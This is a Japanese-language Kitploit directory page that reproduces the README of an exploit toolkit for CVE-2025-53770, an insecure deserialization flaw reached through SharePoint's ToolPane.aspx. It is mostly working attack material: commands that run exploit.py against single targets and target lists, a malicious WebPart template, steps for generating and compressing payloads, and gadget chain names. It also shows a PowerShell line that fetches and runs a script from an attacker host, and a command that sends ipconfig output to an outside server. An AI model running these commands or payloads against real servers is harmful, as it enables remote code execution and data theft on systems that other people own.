Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-53770-Exploit — SharePoint WebPartインジェクションエクスプロイトツール | Kitploit
ツール/GitHubGitHub/soltanali0/cve-2025-53770-exploit
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングペイロード開発
GitHubsoltanali0/cve-2025-53770-exploit

CVE-2025-53770-Exploit

SharePoint WebPartインジェクションエクスプロイトツール

リポジトリを見る
313778ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

📌 SharePoint WebPart インジェクションエクスプロイトツールキット

🍕 ToolPane.aspx を介した SharePoint WebPart インジェクションのエクスプロイトツール。.NET の逆シリアル化と、潜在的なリモートコード実行 (RCE) につながります。

開発者: @GOTOCVE


🌍 概要

このツールは、Microsoft SharePoint (オンプレミス) の脆弱性を悪用します。認証されたユーザーが ToolPane.aspx エンドポイントを悪用し、GZIP 圧縮されたシリアル化 .NET オブジェクトを含む悪意のある WebPart を注入できるようにします。

注入されたオブジェクトは MSOTlPn_SelectedWpId パラメータ内に配置され、SharePoint バックエンドによって解析および逆シリアル化される偽の WebPart (<Scorecard:ExcelDataSet> など) に埋め込まれます。


⚙️ 機能

  • ✅ 自動エンドポイント検証 (ToolPane.aspx)
  • ✅ ユーザー指定ペイロードの注入 (GZIP+Base64 エンコードされた .NET LosFormatter オブジェクト)
  • ✅ Burp/ZAP のプロキシサポート
  • ✅ ファイルベースまたは直接のペイロード入力のサポート

🧪 サポート対象バージョン

製品影響を受けるバージョン
SharePoint Server 201616.0.4351.1000 - 16.0.5508.1000
SharePoint Server 201916.0.10337.12109 - 16.0.10417.20027

⚡ 脆弱性の概要


🧰 ツールキットの構成要素

✅ 1. exploit.py

CVE-2025-53770 用のマルチスレッド SharePoint エクスプロイトツール。

  • SharePoint とバージョンの検出
  • /ToolPane.aspx へのアクセス確認
  • 悪意のある WebPart ペイロードの送信

✅ 2. YSLosf.exe

LosFormatter ペイロード生成 & デシリアライザー。

画像

🚀 使用方法

🔸 基本的な使用方法

root@kitploit:~
python3 exploit.py -u https://target -p payload.txt

🔸 複数ターゲット

root@kitploit:~
python3 exploit.py -f targets.txt -p payload.txt --proxy http://127.0.0.1:8080

🔸 すべての引数


🔧 必要条件

  • Python 3.10
  • 依存関係のインストール:
root@kitploit:~
python -m venv venv
source venv/bin/activate
pip install -r requirements.txt
  • .NET 4.8 ランタイム (YSLosf.exe の実行に必要)

💥 ペイロードの構造

ペイロードは以下の条件を満たす必要があります:

  1. .NET オブジェクト (例: DataSet、ObjectDataProvider)
  2. LosFormatter または BinaryFormatter を使用してシリアル化
  3. Base64 エンコード
  4. GZIP 圧縮

次のような WebPart に埋め込みます:

root@kitploit:~
<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>

🛠 YSLosf を使用したペイロードの生成

ステップ 1: ペイロードファイルを作成する

コマンド (例: リバースシェル) を payload.txt に記述します:

root@kitploit:~
powershell -nop -c iwr http://attacker/shell.ps1 | iex

ステップ 2: Base64 ペイロードを生成する

root@kitploit:~
C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe --p payload.txt
Serialized string:
/wEFBWZsdG1j

Base64 encoded:
L3dFRkJXWnNkRzFq

C:\Users\soltanali0\Desktop\YSLosf\bin\x64\Debug\net48>.\YSLosf.exe -d dpayload.txt
Deserialized object:
fltmc

ステップ 3: 圧縮と仕上げ

root@kitploit:~
# compress.py
import gzip, base64

with open("base64.txt", "rb") as f:
    b64 = base64.b64decode(f.read())
    gz = gzip.compress(b64)
    # print(base64.b64encode(gz).decode())
    encoded = base64.b64encode(gz).decode()

with open("payload-final.txt", "w") as out_file:
    out_file.write(encoded)

出力を payload-final.txt に保存し、エクスプロイトツールに渡します。


🧵 サポートされているガジェットチェーン

  • System.Data.DataSet
  • System.Data.Services.Internal.ExpandedWrapper
  • System.Windows.Data.ObjectDataProvider
  • System.Web.UI.LosFormatter

📡 コマンド出力に関する注意

この脆弱性はレスポンスに出力 (例: ipconfig) を返しません。次のいずれかを行う必要があります:

  • リバースシェルのペイロードを使用する
  • または出力を外部に送信する:
root@kitploit:~
powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"

⚠️ 法的免責事項

このツールは教育および許可されたセキュリティテストのみを目的として提供されています。

明示的な許可なしにシステムに対して使用しないでください。 不正使用は違法かつ非倫理的となる可能性があります。


🔍 検出

脆弱なサーバーがペイロードを受け入れ、MSOTlPn_SelectedWpId を反映するか、注入された WebPart を含むページをレンダリングした場合、悪用可能である可能性が高いです。出力がない場合は、逆シリアル化が失敗したか、サーバーがパッチ適用済みであることを意味します。


🛑 法的明確化と本ツールの範囲

このツールは、シェルコードやウェブシェルを配信または実行しません。 これは、GZIP 圧縮された .NET オブジェクトを含む悪意のある WebPart 構造を使用して、脆弱な ToolPane.aspx エンドポイント経由で .NET 逆シリアル化の脆弱性 (CVE-2025-53770) の悪用を実証するだけです。

🔹 目的: 研究者、レッドチーム、防御者が脆弱な SharePoint サーバーを検出し、カスタムペイロードを使用して注入ベクトルを安全にテストできるようにすること。

🔹 ペイロード: このツールでは、ユーザーが独自のペイロード (例: YSLosf.exe を使用) を生成し、それを Base64 エンコードされた GZIP 文字列として WebPart に埋め込む必要があります。
ペイロード (無害な calc.exe の実行、ビーコンマーカーなど) を適切かつ倫理的に選択するのはユーザーの責任です。

🔹 リバースシェル/ウェブシェルは含まれません:
実際の攻撃者が spinstall0.aspx などのウェブシェルを仕掛ける可能性がありますが、このプロジェクトにはそのようなロジックは一切含まれていません。
リバースシェルを配信する予定がある場合、手動で独自のペイロードを生成し、その使用について全責任を負う必要があります。

スター履歴

Star History Chart

📢 その他のエクスプロイトや CVE は?

Telegram で @GOTOCVE に参加してください:

  • 🔍 毎週の CVE 分析
  • 🧠 詳細なエクスプロイト解説
  • 🛡 レッドチーム & ブルーチームのコンテンツ
  • 💣 実際の PoC & 検出のヒント

📬 連絡先

作成者: Ali Soltani
研究に関する問い合わせやバグ報告は、Telegram までご連絡ください。

ツールをダウンロード
フィールド値
コンポーネントMicrosoft SharePoint (オンプレミス)
エンドポイント/layouts/15/ToolPane.aspx
パラメータMSOTlPn_DWP
WebPart<Scorecard:ExcelDataSet CompressedDataTable>
問題安全でない .NET 逆シリアル化
CVECVE-2025-53770
引数説明
-uターゲット URL (例: https://sp.company.local)
-fターゲット URL を含むファイル (1行に1つ)
-pペイロードファイルまたは Base64 GZIP 文字列を直接指定
--proxy任意のプロキシ (例: http://127.0.0.1:8080)
-tタイムアウト (秒) (デフォルト: 15)